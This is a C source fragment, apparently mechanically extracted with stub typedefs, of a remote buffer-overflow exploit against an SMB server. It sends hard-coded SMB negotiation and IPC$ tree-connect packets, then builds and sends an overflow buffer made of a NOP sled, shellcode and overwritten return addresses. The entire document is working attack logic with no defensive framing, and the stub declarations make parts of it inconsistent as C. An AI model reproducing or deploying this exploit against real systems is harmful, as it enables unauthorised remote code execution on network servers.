
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_long ;
typedef int its_second_time_conn ;
typedef int its_first_time_conn ;
typedef int its_exploit_packet ;
typedef int atk_buf ;


 int DF_NOP ;
 int __BUF_LEN ;
 int __LEN_PAD ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int ,int) ;
 int recv (int,char*,int,int ) ;
 int send (int,char*,int,int ) ;
 char* shellcode ;
 int sleep (int) ;
 int strlen (char*) ;

int __atk_code_send_recv(int sock,u_long shell)
{
 int eat_buf_set=0,atk_buf_pos=0;
 char atk_buf[0x960+5];
 char its_exploit_packet[]={
  0x00,0x04,0x09,0x60,0xff,0x53,0x4d,0x42,
  0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
  0x64,0x00,0x00,0x00,0x00,0xd0,0x07,0x0c,
  0x00,0xd0,0x07,0x0c,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,
  0x07,0x43,0x00,0x0c,0x00,0x14,0x08,0x01,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,
  0x00
 };
 char its_first_time_conn[]={
  0x00,0x00,0x00,0x2e,0xff,0x53,0x4d,0x42,
  0x73,0x00,0x00,0x00,0x00,0x08,0x01,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x64,0x00,0x01,0x00,0x00,0xff,0x00,0x00,
  0x00,0x00,0x20,0x02,0x00,0x01,0x00,0x00,
  0x00,0x00
 };
 char its_second_time_conn[]={
  0x00,0x00,0x00,0x3c,0xff,0x53,0x4d,0x42,
  0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x20,
  0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  0x5c,0x5c,0x69,0x70,0x63,0x24,0x25,0x6e,
  0x6f,0x62,0x6f,0x64,0x79,0x00,0x00,0x00,
  0x00,0x00,0x00,0x00,0x49,0x50,0x43,0x24
 };
 int first_packet_len=sizeof(its_first_time_conn);
 int second_packet_len=sizeof(its_second_time_conn);

 memset((char *)atk_buf,0,sizeof(atk_buf));
 memcpy(atk_buf,its_first_time_conn,sizeof(its_first_time_conn));
 send(sock,atk_buf,first_packet_len,0);
 recv(sock,atk_buf,sizeof(atk_buf)-1,0);

 memset((char *)atk_buf,0,sizeof(atk_buf));
 memcpy(atk_buf,its_second_time_conn,sizeof(its_second_time_conn));
 send(sock,atk_buf,second_packet_len,0);
 recv(sock,atk_buf,sizeof(atk_buf)-1,0);

 memset((char *)atk_buf,0,sizeof(atk_buf));
 memcpy(atk_buf+atk_buf_pos,its_exploit_packet,sizeof(its_exploit_packet));
 atk_buf_pos+=sizeof(its_exploit_packet);

 memset(atk_buf+atk_buf_pos,DF_NOP,((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos));
 atk_buf_pos+=((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos);

 memcpy(atk_buf+atk_buf_pos,shellcode,strlen(shellcode));
 atk_buf_pos+=strlen(shellcode);

 memset(atk_buf+atk_buf_pos,DF_NOP,__LEN_PAD);
 atk_buf_pos+=(__LEN_PAD);



 {
  *(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));
  atk_buf_pos+=4;
  *(long *)&atk_buf[atk_buf_pos]=(shell);
  atk_buf_pos+=4;
  *(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));
  atk_buf_pos+=4;
 }
 send(sock,atk_buf,sizeof(atk_buf)-1,0);
}
